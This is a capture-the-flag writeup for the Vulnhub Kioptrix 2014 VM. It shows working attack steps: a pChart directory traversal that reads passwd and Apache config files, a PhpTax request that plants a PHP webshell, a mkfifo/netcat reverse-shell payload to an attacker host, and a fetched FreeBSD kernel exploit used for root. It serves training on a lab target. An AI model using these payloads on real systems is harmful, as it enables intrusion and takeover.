Welcome to the Kioptrix-5 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Kioptrix-5

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux

Kioptrix: 2014 (#5)

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- 172.20.10.10
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-02 20:46 CEST
Nmap scan report for 172.20.10.10
Host is up (0.00036s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 88.29 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,8080 172.20.10.10
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-02 20:48 CEST
Nmap scan report for 172.20.10.10
Host is up (0.00042s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Device type: general purpose|printer
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X (93%), DYMO embedded (85%)
OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8
Aggressive OS guesses: FreeBSD 9.0-RELEASE - 10.3-RELEASE (93%), FreeBSD 7.0-RELEASE - 9.0-RELEASE (87%), FreeBSD 7.0-RELEASE (85%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (85%), FreeBSD 7.1-RELEASE (85%), FreeBSD 8.0-STABLE (85%), FreeBSD 8.1-RELEASE (85%), DYMO LabelManager Wireless PNP printer (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 172.20.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.18 seconds

Port 80

Within the code of the web of port 80 we can find a URL pChart2.1.3/index.php.

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

Looking for vulnerabilities for the version of pChart that we access with the URL found, we can see in this link that there is a Directory Traversal vulnerability.

By accessing the URL http://172.20.10.10/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd we can verify that it is vulnerable. Let's exploit it to try to get a shell!

 # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Perfect, trying to read some configuration files, we managed to read the configuration file httpd.conf with the server parameters.

http://172.20.10.10/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf

In the server configuration port 8080 indicates that we must have as User Agent Mozilla / 4.0 Mozilla4_browser.

[...]
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>
[...]

Port 8080

With User Agent Configured, we can access and offers us access to a directory calledphptax.

Looking for Vulnerabilities for Phptax, we can find 3 RCE. But like the exploit of Metasploit I do not care because in the exam of the OSCP is not allowed, we are going to use the second.

$ searchsploit phptax
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                     | php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                  | php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                 | php/webapps/21665.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Exploitation

If we read the Exploit, instead of modifying it to work with the User Agent required, we can simply access the URL 172.20.10.10:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E

And after this, as we see on the echo " ______________________________________________\n\n {$url}/data/rce.php?cmd=id\n"; line of the exploit, the file data/rce.php should have been created with our RCE.

Let's try it.

$ curl -H "User-Agent: Mozilla/4.0 Mozilla4_browser" "172.20.10.10:8080/phptax/data/rce.php?cmd=id"
uid=80(www) gid=80(www) groups=80(www)

Yes! We have RCE, now let's get a shell. We put a terminal to listener and run our URL encoded payload.

- Payload: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.4 8787 >/tmp/f
- URL encoded payload: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20172.20.10.4%208787%20%3E%2Ftmp%2Ff
$ curl -H "User-Agent: Mozilla/4.0 Mozilla4_browser" "172.20.10.10:8080/phptax/data/rce.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20172.20.10.4%208787%20%3E%2Ftmp%2Ff"
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.10] 19335
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
$

And we already have Shell!

Post exploitation

Privilege escalation: www to root

Enumeration

Looking for the version of the system on the internet we can find an exploit available for privilege escalation in this exploit-db URL.

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64

Exploitation

$ fetch http://172.20.10.4/sysret.c
sysret.c                                      100% of 5387  B   18 MBps
$ gcc sysret.c -o sysret
$

Well, we have the exploit loaded on the machine and compiled. Let's run it.

$ ./sysret
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
$

We are root! let's read his flag.

$ cat congrats.txt 
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

And that have been all!